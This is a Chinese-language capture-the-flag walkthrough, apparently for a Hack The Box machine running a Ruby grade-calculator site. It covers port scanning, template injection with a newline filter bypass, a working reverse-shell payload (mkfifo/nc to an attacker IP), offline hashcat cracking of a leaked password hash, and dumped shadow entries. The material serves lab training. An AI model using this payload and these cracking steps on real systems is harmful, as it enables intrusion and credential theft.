基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sC -sV 10.10.11.253
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 13:42 CST
Nmap scan report for 10.10.11.253
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.33 seconds

80

在线加权成绩计算器:

weighted-grade-calc

页面底部可以看到WEBrick 1.7.0,测试功能就是输入标签成绩百分比,计算加权成绩,给出的结果中包含我们输入的category:

SSTI

根据前面看到的WEBrick知道是ruby,测试常规ssti发现存在过滤:

crlf bypass

过滤一般是通过正则之类的,而ruby很常见的一个问题是正则只匹配单行,导致换行绕过:

shell

payload url编码,打到susan用户

1
<%= system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.8 4444 >/tmp/f') %>

user flag

susan用户目录,写公钥方便后续操作:

提权信息

susan就在sudo组中,但需要密码,登录的时候提示有新邮件,查看邮件得到密码规则:

另外可以看到一个sqlite文件,其中可以得到susan的hash:

1
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

hash crack

现在密码规则和hash都有了,那就是离线破解密码:

1
2
3
4
5
# susan_nasus_1-1,000,000,000
# 从1位到10位
hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d?d?d"

susan_nasus_413759210

提权 & root flag

破解出susan密码后就是直接sudo了:

shadow

1
2
root:$y$j9T$71hm.H7E.Jek01MNCWa.d0$FoTA1/EWWEDDDeMklpfTV9CmxBPoan8E0s3krRMPj2/:19490:0:99999:7:::
susan:$y$j9T$lDiE.68crplrSJzmhskuH0$KC/O4ZHNz2p8OfWz1bfk9rxwhTkGdViBHgSo.2s1Ci5:19490:0:99999:7:::

参考资料